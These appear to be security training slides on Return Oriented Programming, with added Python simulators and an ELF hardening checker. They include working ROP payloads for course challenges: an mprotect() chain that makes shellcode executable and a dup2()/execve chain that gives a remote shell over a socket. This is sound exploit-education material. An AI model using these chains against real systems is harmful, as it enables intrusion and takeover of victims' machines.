Tel +41 55 214 41 60 Fax +41 55 214 41 61 team@csnc.ch www.csnc.ch
Compass Security Schweiz AG Werkstrasse 20 Postfach 2038 CH-8645 Jona
Return Oriented Programming
ROP
© Compass Security Schweiz AG Slide 2 www.csnc.ch
Exploit Mitigations
Mitigations: DEP, PIE, ASLR, Stack Canary, ASCII Armor
Exploit techniques: Partial RIP Overwrite, Brute Force, Heap Overflows, Overflow Local Vars, Arbitrary Write, NOP Slide, Info Disclosure, Ret 2 PLT, ROP
Exploiting: DEP - Memory Layout
  Stack              rw-
  Heap               rw-
  Code (0x0804800)   r-x
Exploiting: DEP - ROP
DEP does not allow execution of uploaded code
But what about existing code?
ROP: smartly put together existing code
ROP In One Slide
ROP Preview
handleData() stack frame: &blubb, SIP (&<func>), SFP, isAdmin, firstname
Overflow data, in write order: &pop/pop/ret (into the &blubb slot), 0x01, 0x02, SIP (&<func>), SIP (&<…>), 0x11, 0x22
Each ret pops the next entry and continues the chain: ret, ret, ret, ret
Gadgets
ROP
Exploiting DEP - ROP
What is ROP?
Smartly chain gadgets together to execute arbitrary code
Gadgets: some sequence of instructions, followed by a RET
Exploiting: DEP ROP - Gadgets
So, what are gadgets?
pop r15 ; ret
add byte ptr [rcx], al ; ret
dec ecx ; ret
Exploiting: DEP ROP - Gadgets
add byte ptr [rax], al ; add bl, dh ; ret
add byte ptr [rax], al ; add byte ptr [rax], al ; ret
add byte ptr [rax], al ; add cl, cl ; ret
add byte ptr [rax], al ; add rsp, 8 ; ret
add byte ptr [rax], al ; jmp 0x400839
add byte ptr [rax], al ; leave ; ret
add byte ptr [rax], al ; pop rbp ; ret
add byte ptr [rax], al ; ret
add byte ptr [rcx], al ; ret
add cl, cl ; ret
add eax, 0x20087e ; add ebx, esi ; ret
add eax, 0xb8 ; add cl, cl ; ret
add ebx, esi ; ret
Exploiting: DEP ROP - Gadgets
How to find gadgets? Search the code section for the byte 0xc3 (= ret)
Go backwards from the ret and decode from each byte:
For each byte:
Check if the bytes from there up to the ret decode into valid x86 instructions
If yes: add the gadget, and continue
If no: continue with the next byte
80 00 51 02 80 31 60 00 0e 05 c3 20 07 dd da 23
Exploiting: DEP ROP - Gadgets
There will be gadgets which were not created by the compiler: x86 instructions do not have a static size
1-15 bytes
Unlike RISC (usually 4 bytes)
ROP Introduction
Why does ROP work
Why does ROP work
Executing one gadget is nice
But we want to chain gadgets together
Is this possible?
Why does ROP work
Remember this? x32 call convention. Stack frame of <add> (high addresses first; push grows the stack downwards, pop shrinks it):
  y      Argument 2 for <add>
  x      Argument 1 for <add>
  SIP    Saved IP (&return)
  SFP    Saved Frame Pointer
  c      Local Variables of <add>
Why does ROP work
Let's optimize function calling a bit
Ergo: let's create our own call convention!
This EBP/SFP thingy
Why does ROP work
Remember this? x32 call convention details
Caller:
  push 4            ; argument 2
  push 3            ; argument 1
  push EIP          ; call <add> is ...
  jmp <add>         ; ... push EIP + jmp
Callee <add>:
  push ebp
  mov ebp, esp
  sub esp, 0x10
  [Function Code]
  mov esp, ebp      ; leave
  pop ebp           ; leave
  pop eip           ; ret
Why does ROP work
Call is the same! (only caller-internals changed)
Why does ROP work
How would the stack look like for our self-defined call convention? Start from the standard frame:
  y      Argument 2 for <add>
  x      Argument 1 for <add>
  SIP    Saved IP (&return)
  SFP    Saved Frame Pointer
  c      Local Variables of <add>
Why does ROP work
How would the stack look like for our self-defined call convention? Without the saved frame pointer:
  y      Argument 2
  x      Argument 1
  SIP    Saved IP (&next instruction)
  local variables
Note: SIP gets pushed by "call"
Why does ROP work
How would the stack look like for our self-defined call convention?
Stack (RSP points at SIP):      Function:
  y                               [Function Code]
  x                               ret ; // pop EIP
  SIP  <- RSP
ROP: Reminder: Normal Call
ROP: Reminder: Normal Call
Let's check the normal call convention process again
ROP: Reminder: Normal Call
Reminder: buffer overflow, pre-overflow. Stack frame of <handleData> (high addresses first; push grows the stack downwards):
  &blubb      Argument arg1 for <handleData>
  SIP         Saved IP (&mov@main)
  SFP         Saved Frame Pointer
  isAdmin     Local Variable 1
  firstname   Local Variable 2
ROP: Reminder: Normal Call
Stack frame of <handleData>: &blubb, SIP (&mov@main), SFP, isAdmin, firstname
<main>:
  call <handleData>
  mov …               ; SIP points here: the return address pushed by call
<handleData>:
  …
  ret                 ; pops SIP into EIP; ESP moves up by one word
Exploiting: DEP - ROP
Now, let's add the overflow
ROP By Example
ROP By Example
int a, int
Hand-written assembly, no standard call convention:
add:
  mov 0x8(%esp),%eax    ; second argument (AT&T syntax: [esp+8])
  add 0x4(%esp),%eax    ; plus first argument ([esp+4]); result in eax
  ret                   ; [esp] is the return address
ROP By Example
handleData() stack, original frame: &blubb, SIP (&<mov@main>), SFP, isAdmin, firstname
Overflow data, written from firstname upwards: …, &<add> (into the SIP slot), SIP2 (into the &blubb slot), x, y
ROP By Example
handleData() stack after overflow (high addresses first):
  y
  x
  SIP2              (in the &blubb slot)
  SIP (&<add>)      (was &<mov@main>)
  SFP
  isAdmin
  firstname
ROP By Example: On ret@handleData
handleData() stack (high addresses first): y, x, SIP2 (in the &blubb slot), SIP (&<add>), SFP, isAdmin, firstname
<handleData>:  … ret          <- EIP is at this ret; ESP points at SIP (&<add>)
<add>:         mov… add… ret
ROP By Example: After ret@handleData
handleData() stack (high addresses first): y, x, SIP2 (in the &blubb slot), SIP (&<add>), SFP, isAdmin, firstname
<handleData>:  … ret
<add>:         mov… add… ret  <- EIP is at the first instruction of <add>; ESP points at SIP2
ROP By Example: On ret@add
handleData() stack (high addresses first): y, x, SIP2 (in the &blubb slot), SIP (&<add>), SFP, isAdmin, firstname
<handleData>:  … ret
<add>:         mov… add… ret  <- EIP is at this ret; add read x and y relative to ESP, which still points at SIP2, so this ret pops SIP2 into EIP
ROP By Example
What does this mean?
Let's do it again... First: call add(0x01, 0x02);
Then: call add2(0x11, 0x22);
ROP By Example
Stack before the overflow (high addresses first):
Previous function's stack frame (handleData() doesn't/can't know what is there):
  ??
  ??
  ??
  ??
  ??
  ??
  ??
Regular handleData() stack frame:
  &blubb
  SIP (&<mov@main>)     <- SIP points to main() initially
  SFP
  isAdmin
  firstname
ROP By Example
The data we wrote via the overflow (red on the slide), in write order from low to high addresses:
  firstname, isAdmin, SFP   regular handleData() stack frame, overwritten on the way
  SIP (&<add>)              SIP points to add() now!
  &pop/pop/ret              in the &blubb slot; add stuff: return address for add
  0x01                      add stuff: argument 1
  0x02                      add stuff: argument 2
  SIP (&<add2>)             the next gadget: add2
  SIP (&<…>)                add2 stuff: return address for add2 (the pop/pop/ret again)
  0x11                      add2 stuff: argument 1
  0x22                      add2 stuff: argument 2
ROP By Example
Execution, step 1: ret@handleData pops SIP (&<add>) into EIP; ESP now points at the &blubb slot, which holds &pop/pop/ret.
<add>:
  mov 0x8(%esp),%eax    ; 0x02
  add 0x4(%esp),%eax    ; + 0x01 -> eax = 0x03
  ret                   ; pops &pop/pop/ret
Stack (write order): SIP (&<add>), &pop/pop/ret, 0x01, 0x02, SIP (&<add2>), SIP (&<…>), 0x11, 0x22
ROP By Example
Execution, step 2: the pop/pop/ret gadget at <0xaabb> removes the two arguments of add from the stack.
<0xaabb>:
  pop eax               ; 0x01
  pop ebx               ; 0x02
  ret                   ; pops SIP (&<add2>)
Stack (write order): SIP (&<add>), &pop/pop/ret, 0x01, 0x02, SIP (&<add2>), SIP (&<…>), 0x11, 0x22
ROP By Example
Execution, step 3: add2 runs exactly like add, with its own arguments.
<add2>:
  mov 0x8(%esp),%eax    ; 0x22
  add 0x4(%esp),%eax    ; + 0x11 -> eax = 0x33
  ret                   ; pops the second &pop/pop/ret (<0xaabb>), which removes 0x11 and 0x22 and returns to the next address
Stack (write order): SIP (&<add>), &pop/pop/ret, 0x01, 0x02, SIP (&<add2>), SIP (&<…>), 0x11, 0x22
ROP By Example
Regular handleData() stack frame: SIP (&<add>), SFP, isAdmin, firstname
Overflow data, in write order:
  &pop/pop/ret    in the &blubb slot; add returns here
  0x01            <add> arg 1
  0x02            <add> arg 2
  &<add2>         popped by the ret of pop/pop/ret
  &pop/pop/ret    add2 returns here
  0x11            <add2> arg 1
  0x22            <add2> arg 2
  &<func>         popped by the ret of the second pop/pop/ret
ret, ret, ret, ret: every ret continues the chain
ROP By Example
handleData() frame (SIP (&<add>), SFP, isAdmin, firstname) followed by the chain (&pop/pop/ret, 0x01, 0x02, &<add2>, …); every ret moves on to the next entry
Writes go up: the overflow fills memory towards higher addresses
Stack grows down: push moves ESP towards lower addresses, so each ret/pop consumes the chain towards higher addresses
ROP By Example
handleData() frame (SIP (&<add>), SFP, isAdmin, firstname) followed by the chain (&pop/pop/ret, 0x01, 0x02, &<add2>, …)
Seen from add():   <stack>  SIP  ARG1  ARG2   ([esp], [esp+4], [esp+8])
Seen from add2():  <stack>  SIP  …             (the same layout, further up the stack)
ROP By Example
Calls can be chained!
Arbitrary code execution with no code uploaded. What the overflow data contains:
Addresses of gadgets
Arguments for gadgets (addresses, or immediates)
NOT: assembler instructions
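To make the chain walked through on the preceding slides concrete, here is a small Python simulation; it is an added example, not the slides' code. The word-addressed stack, the code addresses and the &<func> stop marker are constructed (the slides name the pop/pop/ret gadget only as <0xaabb>). `run_chain` emulates ret@handleData on the overflow data and follows every ret; a second chain without the pop/pop/ret glue shows why the arguments have to be removed: add2 would otherwise return into the value 0x01.

```python
"""
Simulation of the chain walked through on the slides: add(0x01, 0x02), then
add2(0x11, 0x22), glued together with a pop/pop/ret gadget that drops the two
argument slots so that each ret lands on the next gadget address.
Added example, not the slides' code. The word-addressed stack, the code addresses
and the HALT marker (&<func>) are constructed for this example; the slides name
the pop/pop/ret gadget only as <0xaabb>.
"""
from dataclasses import dataclass, field

WORD = 4
MASK = 0xFFFFFFFF
STACK_BASE = 0xBFFFF000   # constructed address of handleData()'s SIP slot

ADDR_ADD = 0x08048500     # add:  mov 0x8(%esp),%eax ; add 0x4(%esp),%eax ; ret
ADDR_ADD2 = 0x08048520    # add2: same body
ADDR_PPR = 0x0804AABB     # pop eax ; pop ebx ; ret   (the slides' <0xaabb>)
ADDR_FUNC = 0x08048600    # &<func>: where the chain continues; the simulator stops here


@dataclass
class Machine:
    mem: dict                 # word address -> 32-bit value (the stack only)
    esp: int
    eip: int = 0
    regs: dict = field(default_factory=lambda: {"eax": 0, "ebx": 0})
    trace: list = field(default_factory=list)

    def pop(self) -> int:
        value = self.mem[self.esp]
        self.esp += WORD
        return value

    def ret(self) -> None:    # ret is nothing more than "pop eip"
        self.eip = self.pop()


def gadget_add(m: Machine, name: str) -> None:
    # Hand-written convention: [esp] = return address, [esp+4] = arg 1, [esp+8] = arg 2.
    m.regs["eax"] = (m.mem[m.esp + 8] + m.mem[m.esp + 4]) & MASK
    m.trace.append((name, m.regs["eax"]))
    m.ret()


def gadget_pop_pop_ret(m: Machine) -> None:
    # Consumes the two argument slots, then ret pops the next gadget address.
    m.regs["eax"] = m.pop()
    m.regs["ebx"] = m.pop()
    m.trace.append(("pop/pop/ret", (m.regs["eax"], m.regs["ebx"])))
    m.ret()


GADGETS = {
    ADDR_ADD: lambda m: gadget_add(m, "add"),
    ADDR_ADD2: lambda m: gadget_add(m, "add2"),
    ADDR_PPR: gadget_pop_pop_ret,
}

# Overflow data in write order, starting at the SIP slot of handleData()
# ("writes go up": each following word sits 4 bytes higher).
ROP_CHAIN = [ADDR_ADD, ADDR_PPR, 0x01, 0x02, ADDR_ADD2, ADDR_PPR, 0x11, 0x22, ADDR_FUNC]
# The same two calls without the pop/pop/ret glue: the arguments are never removed.
NAIVE_CHAIN = [ADDR_ADD, ADDR_ADD2, 0x01, 0x02, ADDR_FUNC]


def run_chain(words, max_steps: int = 50):
    """Emulate ret@handleData() on an overflowed frame and follow the chain.
    Returns (trace, stop_reason)."""
    mem = {STACK_BASE + i * WORD: w for i, w in enumerate(words)}
    m = Machine(mem=mem, esp=STACK_BASE)
    m.ret()                                # ret@handleData pops the overwritten SIP
    for _ in range(max_steps):
        if m.eip == ADDR_FUNC:
            return m.trace, "reached &<func>"
        gadget = GADGETS.get(m.eip)
        if gadget is None:                 # eip landed in data: DEP/unmapped memory -> crash
            return m.trace, f"fault at eip={m.eip:#010x}"
        gadget(m)
    return m.trace, "step limit"


if __name__ == "__main__":
    for chain in (ROP_CHAIN, NAIVE_CHAIN):
        trace, why = run_chain(chain)
        for step in trace:
            print(step)
        print(why, "\n")
```

The first run produces add = 0x03, the pop/pop/ret consuming (0x01, 0x02), add2 = 0x33 and a second pop/pop/ret consuming (0x11, 0x22) before control reaches &<func>; the naive chain computes add correctly, but add2 then reads &<func> and 0x02 as its arguments and its ret pops 0x01 into EIP, which is the fault a missing pop/pop/ret causes.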
ROP Tools
Exploiting DEP: ROP Gadgets
ROPgadget
ROPgadget
ROPgadget.py --ropchain
Some more ROP Infos
Some more ROP Infos
Where to take gadgets from?
Either: The program code
Or: Shared library code (LIBC etc.)
Some more ROP Infos
Where to take gadgets from?
Either: The program code
Static location in memory (if not PIE)
Needs to be of some size to have enough gadgets
Or: Shared library code (LIBC etc.)
Sadly, non-
Some more ROP Infos
ROP shellcode usually consists of:
Libc calls: malloc() / mprotect()
Preparations of libc calls: set up registers, read data to defeat ASLR
Skipping of shellcode arguments (pop/pop/ret)
Some more ROP Infos
ROP is very inefficient
Needs a lot of gadgets
Not suitable to implement complete shellcode in it
Hello: Multi Stage Shellcode
Some more ROP Infos
Stager: Change permission
• Set Stack executable
• Execute it (jmp)
• Profit
Some more ROP Infos
Stager: Allocator
• Allocate new RWX memory
• Copy rest of shellcode to newly allocated memory
• Execute it (jmp)
• Profit
Some more ROP Infos
Stage 0 (ROP): Allocate rwx memory
Stage 1 (ROP): Copy minimal shellcode to that memory, jump to it
Stage 2 (Shellcode): Copy the rest of the shellcode (meterpreter), jump to it
Practical ROP
Practical ROP: mprotect() + Shellcode
Practical ROP
mprotect() ROP into shellcode. Defeats: DEP (not: DEP+ASLR)
Get the address of the shellcode
SIP = start of the ROP chain
The ROP chain does: mprotect(&shellcode, len(shellcode), rwx)
After the ROP chain, jump to the shellcode
Challenge 16: https://exploit.courses/#/challenge/16
DEP enabled
ASLR disabled (can use LIBC gadgets)
Practical ROP
mprotect() ROP into shellcode
# shellcode first, then padding up to the saved return address (SIP)
payload = shellcode
payload += "A" * (offset - len(shellcode))
# ROP chain starts here (overwrites the SIP); gadget offsets are relative to libcBase
# 0x000000000003a718: pop rax; ret;
payload += p64(libcBase + 0x000000000003a718)
payload += p64(10)                 # rax = 10: syscall sys_mprotect
# 0x0000000000021102: pop rdi; ret;
payload += p64(libcBase + 0x0000000000021102)
payload += p64(stackAddr)          # mprotect arg 1: addr (page-aligned stack address holding the shellcode)
# 0x00000000000202e8: pop rsi; ret;
payload += p64(libcBase + 0x00000000000202e8)
payload += p64(4096)               # mprotect arg 2: size
# 0x0000000000001b92: pop rdx; ret;
payload += p64(libcBase + 0x0000000000001b92)
payload += p64(0x7)                # mprotect arg 3: permissions (rwx)
# 0x00000000000bb945: syscall; ret;
payload += p64(libcBase + 0x00000000000bb945)
payload += p64(shellcodeAddr)      # the final ret jumps into the now executable shellcode
Practical ROP: dup2() into execv() with LIBC
Practical ROP
dup2() into execv() with LIBC. Defeats: DEP + ASLR (not: DEP+ASLR+PIE)
dup2() the client network socket onto fds 0, 1 and 2, then execute a shell
Challenge 17: https://exploit.courses/#/challenge/17
DEP enabled
ASLR enabled
Practical ROP
The client socket is always fd 4 (found via debugging)
gdb-peda$ find "/bin/sh"
Searching for '/bin/sh' in: None ranges
Found 2 results, display max 2 items:
challenge17 : 0x400ed8 --> 0x68732f6e69622f ('/bin/sh')
libc : 0x7ff0519cd58b --> 0x68732f6e69622f ('/bin/sh')
Practical ROP
# Start ROP chain (gadget addresses taken from the non-PIE binary)
# 0x0000000000400eb1: pop rsi; pop r15; ret;
# dup2() syscall is 33
# dup2(4, 0)
payload += p64(pop_rax)
payload += p64(33)
payload += p64(pop_rdi)
payload += p64(4)
payload += p64(pop_rsi_r15)
payload += p64(0)
payload += p64(0xdeadbeef1)        # junk for r15
payload += p64(syscall)
# dup2(4, 1)
payload += p64(pop_rax)
payload += p64(33)
payload += p64(pop_rdi)
payload += p64(4)
payload += p64(pop_rsi_r15)
payload += p64(1)
payload += p64(0xdeadbeef2)        # junk for r15
payload += p64(syscall)
# dup2(4, 2)
payload += p64(pop_rax)
payload += p64(33)
payload += p64(pop_rdi)
payload += p64(4)
payload += p64(pop_rsi_r15)
payload += p64(2)
payload += p64(0xdeadbeef3)        # junk for r15
payload += p64(syscall)
# execve("/bin/sh", argv, envp)
payload += p64(pop_rdi)
payload += p64(sh_addr)            # "/bin/sh" found in LIBC
payload += p64(pop_rsi_r15)
payload += p64(0x6020e0)           # addr of 0 bytes: NULL argv
payload += p64(0xdeadbeef4)        # junk for r15
payload += p64(pop_rax)
payload += p64(59)                 # syscall sys_execve
payload += p64(syscall)            # execute execve()
payload += p64(0x41414141)         # fail: only reached if execve() returns
Practical ROP
Write-what-where ROP:
# value to write
pop rax; ret
# memory location where we want to write the value
pop rdx; ret
# write rax to the memory location indicated by rdx
mov qword ptr [rdx], rax; ret
Practical ROP
# 0x00000000004009a0: pop rbp; ret;
# 0x0000000000400c91: pop rax; ret;
# 0x0000000000400c8e: mov dword ptr [rbp - 8], eax; pop rax; ret;
def write2mem(data, location, chain):
    # writes the low 32 bits of data to location (the gadget stores eax only)
    chain += p64(pop_rax)
    chain += p64(data)
    chain += p64(pop_rbp)
    chain += p64(location + 8)       # the gadget writes to [rbp - 8]
    chain += p64(mov_ptr_rbp_eax)
    chain += p64(0xdeadbeef1)        # consumed by the gadget's trailing pop rax
    return chain                     # strings are immutable: the caller must use the returned chain
Practical ROP
Where to write? Every binary has a read-write memory location at a static offset
gdb-peda$ vmmap
Start End Perm Name
0x00400000 0x00402000 r-xp challenge17
0x00601000 0x00602000 r--p challenge17
0x00602000 0x00603000 rw-p challenge17
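Added example, not code from the slides: a toy interpreter for chains of the shape shown in the "ROP By Example", mprotect(), dup2()/execve() and write-what-where slides. It models a handful of gadgets, four at the addresses the challenge17 slides list (pop rbp, pop rax, pop rsi/pop r15, mov dword ptr [rbp - 8], eax) and three at constructed addresses (pop rdi, pop rdx, syscall; ret), and runs the mprotect() chain, the write2mem() primitive and an execve() chain against it. What it makes visible is the point of the "ROP By Example" slides: the chain holds nothing but addresses and immediates, each gadget's trailing ret pops the next one, and an analyst handed a captured chain can decode it into the syscalls it would issue without executing anything.

```python
"""Toy interpreter for ROP chains of the shape shown on the slides.

Added example (not the slides' code): a minimal x86-64 model whose only
code is a few gadgets at fixed addresses. The chain is the stack; every
gadget ends in 'ret', which just pops the next word as the new rip.
"""
import struct

MASK64 = 0xFFFFFFFFFFFFFFFF


def p64(value):
    """Pack an integer as a little-endian 8-byte word (pwntools style)."""
    return struct.pack("<Q", value & MASK64)


# Gadget addresses. The first four are the ones listed on the challenge17
# slides; the last three are constructed for this example, not real offsets.
POP_RBP = 0x4009A0        # pop rbp; ret
POP_RAX = 0x400C91        # pop rax; ret
MOV_RBP8_EAX = 0x400C8E   # mov dword ptr [rbp - 8], eax; pop rax; ret
POP_RSI_R15 = 0x400EB1    # pop rsi; pop r15; ret
POP_RDI = 0x400C95        # pop rdi; ret      (constructed)
POP_RDX = 0x400C99        # pop rdx; ret      (constructed)
SYSCALL_RET = 0x400CB0    # syscall; ret      (constructed)

SYS_MPROTECT, SYS_EXECVE = 10, 59


class RopMachine:
    """Registers, a byte-addressed memory and the chain as the stack."""

    def __init__(self, chain):
        self.regs = dict.fromkeys(["rax", "rdi", "rsi", "rdx", "rbp", "r15"], 0)
        self.mem = {}           # address -> byte; unwritten memory reads as 0
        self.words = [struct.unpack("<Q", chain[i:i + 8])[0]
                      for i in range(0, len(chain), 8)]
        self.rsp = 0            # index of the next stack word
        self.syscalls = []      # (rax, rdi, rsi, rdx) recorded per 'syscall'

    def pop(self):
        if self.rsp >= len(self.words):
            raise IndexError("chain ran out of stack words")
        word, self.rsp = self.words[self.rsp], self.rsp + 1
        return word

    def run(self, max_gadgets=256):
        """Execute gadgets until control leaves the gadget set; return that address
        (the shellcode address after the mprotect chain, 0x41414141 after execve)."""
        for _ in range(max_gadgets):
            rip = self.pop()                      # the previous gadget's 'ret'
            if rip == POP_RAX:
                self.regs["rax"] = self.pop()
            elif rip == POP_RDI:
                self.regs["rdi"] = self.pop()
            elif rip == POP_RDX:
                self.regs["rdx"] = self.pop()
            elif rip == POP_RBP:
                self.regs["rbp"] = self.pop()
            elif rip == POP_RSI_R15:
                self.regs["rsi"] = self.pop()
                self.regs["r15"] = self.pop()     # the junk word on the slides
            elif rip == MOV_RBP8_EAX:
                base = self.regs["rbp"] - 8       # 4-byte store: only eax lands in memory
                for i, b in enumerate(struct.pack("<I", self.regs["rax"] & 0xFFFFFFFF)):
                    self.mem[base + i] = b
                self.regs["rax"] = self.pop()     # the gadget's own trailing 'pop rax'
            elif rip == SYSCALL_RET:
                r = self.regs
                self.syscalls.append((r["rax"], r["rdi"], r["rsi"], r["rdx"]))
                r["rax"] = 0                      # model every syscall as succeeding
            else:
                return rip
        raise RuntimeError("gadget budget exhausted")

    def read(self, addr, n):
        return bytes(self.mem.get(addr + i, 0) for i in range(n))


def mprotect_chain(shellcode_addr, size=4096):
    """The slides' mprotect(addr, size, rwx) chain, ending in a jump to the shellcode."""
    chain = p64(POP_RAX) + p64(SYS_MPROTECT)
    chain += p64(POP_RDI) + p64(shellcode_addr)
    chain += p64(POP_RSI_R15) + p64(size) + p64(0xDEADBEEF)
    chain += p64(POP_RDX) + p64(0x7)
    return chain + p64(SYSCALL_RET) + p64(shellcode_addr)


def write2mem(data, location, chain=b""):
    """The slides' write-what-where primitive; returns the extended chain."""
    chain += p64(POP_RAX) + p64(data)
    chain += p64(POP_RBP) + p64(location + 8)     # gadget stores at [rbp - 8]
    return chain + p64(MOV_RBP8_EAX) + p64(0xDEADBEEF)   # eaten by the trailing pop rax


def write_string_then_execve(string, rw_addr, argv_zero_addr):
    """Write a NUL-terminated string into R/W memory one dword at a time,
    then execve(rw_addr, argv_zero_addr, rdx) with rdx left at its initial 0."""
    data = string + b"\x00"
    data += b"\x00" * (-len(data) % 4)
    chain = b""
    for off in range(0, len(data), 4):
        chain = write2mem(struct.unpack("<I", data[off:off + 4])[0], rw_addr + off, chain)
    chain += p64(POP_RDI) + p64(rw_addr)
    chain += p64(POP_RSI_R15) + p64(argv_zero_addr) + p64(0xDEADBEEF)
    chain += p64(POP_RAX) + p64(SYS_EXECVE)
    return chain + p64(SYSCALL_RET) + p64(0x41414141)   # 'fail' word after execve


def trace(chain):
    """Run a chain; return (syscalls issued, address control left to, machine)."""
    m = RopMachine(chain)
    end = m.run()
    return m.syscalls, end, m
```

The addresses 0x602000 and 0x6020e0 used in the test below are the rw-p region and the "addr of 0 bytes" from the challenge17 slides; the string is written with two dword stores because the gadget only moves eax, which is why the slides' write2mem() takes a location and writes 4 bytes at a time.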
Practical ROP
Diagram: memory layout with Stack (rw-), Read-write data (rw-) and Code (r-x). The ropchain lives on the stack; its return addresses point to Code.
Practical ROP
Diagram: the same layout (Stack rw-, Read-write data rw-, Code r-x). The ropchain on the stack writes a string or shellcode into the R/W memory.
Insomnihack Teaser
Insomnihack Teaser
Insomnihack: Security Conference in Geneva
Got a Teaser CTF (Capture the Flag)
Baby challenge:
Forking Server
64 bit
ASLR
PIE
Stack Canary
ROP: Conclusion
ROP: Conclusion
Ret2libc / ret2got / ret2plt: execute arbitrary library functions
ROP: execute arbitrary code by re-using existing code from the program or shared libraries
Can by itself defeat ASLR + DEP
Can defeat ASLR + DEP + PIE with an information disclosure
Find gadgets in:
The program itself (if big enough, .text)
LIBC (if not ASLR)
LIBC (by using gadgets from .text to leak a LIBC pointer via the GOT)
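Added example, not code from the slides: a small ELF64 check for the properties that the "Where to take gadgets from?" slides and this conclusion hinge on. It reads only the ELF header and program headers (no external library) and reports whether the program's own code sits at a static address (ET_EXEC, i.e. not PIE), whether the stack is non-executable (PT_GNU_STACK without PF_X), how many executable bytes there are to mine for gadgets, and whether any loaded segment is already RWX. The two sample images are constructed in memory so the script runs offline; they carry headers only, no real code.

```python
"""Minimal ELF64 hardening check: where could ROP gadgets come from?

Added example (not the slides' code). Parses the ELF header and program
headers of a little-endian ELF64 image with the standard library only.
"""
import struct

ELF_MAGIC = b"\x7fELF"
ET_EXEC, ET_DYN = 2, 3
PT_LOAD, PT_GNU_STACK = 1, 0x6474E551
PF_X, PF_W, PF_R = 1, 2, 4
EHDR_FMT, PHDR_FMT = "<16sHHIQQQIHHHHHH", "<IIQQQQQQ"   # Elf64_Ehdr, Elf64_Phdr


def parse_elf64(blob):
    """Return (e_type, [(p_type, p_flags, p_filesz), ...]) for an ELF64 LE image."""
    if blob[:4] != ELF_MAGIC or blob[4] != 2 or blob[5] != 1:
        raise ValueError("not a little-endian ELF64 image")
    (_, e_type, _, _, _, e_phoff, _, _, _, e_phentsize, e_phnum,
     _, _, _) = struct.unpack_from(EHDR_FMT, blob, 0)
    phdrs = []
    for i in range(e_phnum):
        p_type, p_flags, _, _, _, p_filesz, _, _ = struct.unpack_from(
            PHDR_FMT, blob, e_phoff + i * e_phentsize)
        phdrs.append((p_type, p_flags, p_filesz))
    return e_type, phdrs


def checksec(blob):
    """Summarise the properties that decide where ROP gadgets can come from."""
    e_type, phdrs = parse_elf64(blob)
    stack_flags = [f for t, f, _ in phdrs if t == PT_GNU_STACK]
    # No PT_GNU_STACK at all: the kernel has historically fallen back to an
    # executable stack on x86, so report the conservative answer.
    nx = bool(stack_flags) and not (stack_flags[0] & PF_X)
    exec_bytes = sum(sz for t, f, sz in phdrs if t == PT_LOAD and f & PF_X)
    rwx = sum(1 for t, f, _ in phdrs
              if t == PT_LOAD and (f & (PF_W | PF_X)) == (PF_W | PF_X))
    return {
        "pie": e_type == ET_DYN,         # ET_DYN: the loader picks the base, ASLR moves it
        "nx": nx,                        # DEP: stack not executable
        "executable_bytes": exec_bytes,  # how much .text there is to mine for gadgets
        "rwx_segments": rwx,             # writable+executable mapping already present
        "static_gadgets": e_type == ET_EXEC and exec_bytes > 0,  # gadgets at fixed addresses
    }


def build_elf64(e_type, segments):
    """Construct a header-only ELF64 image for testing (constructed sample, no code).
    segments: list of (p_type, p_flags, p_filesz)."""
    ident = ELF_MAGIC + b"\x02\x01\x01" + b"\x00" * 9   # class 64, LE, version 1
    ehdr = struct.pack(EHDR_FMT, ident, e_type, 0x3E, 1, 0x400000, 64, 0, 0,
                       64, 56, len(segments), 64, 0, 0)
    phdrs = b"".join(struct.pack(PHDR_FMT, t, f, 0, 0x400000, 0x400000, sz, sz, 0x1000)
                     for t, f, sz in segments)
    return ehdr + phdrs


# Constructed samples: a classic non-PIE binary like challenge17 (r-x code at a
# fixed address, NX stack) and a PIE binary linked with an executable stack.
NON_PIE_NX = build_elf64(ET_EXEC, [(PT_LOAD, PF_R | PF_X, 0x2000),
                                   (PT_LOAD, PF_R | PF_W, 0x1000),
                                   (PT_GNU_STACK, PF_R | PF_W, 0)])
PIE_EXECSTACK = build_elf64(ET_DYN, [(PT_LOAD, PF_R | PF_X, 0x800),
                                     (PT_GNU_STACK, PF_R | PF_W | PF_X, 0)])

if __name__ == "__main__":
    for name, image in (("non-PIE, NX", NON_PIE_NX), ("PIE, exec stack", PIE_EXECSTACK)):
        print(name, checksec(image))
```

On a real binary, pass the file contents to checksec(); a "static_gadgets" result of True means the program's own .text is usable without any leak, which is exactly the non-PIE case the conclusion describes, while a PIE binary pushes an attacker towards an information disclosure first.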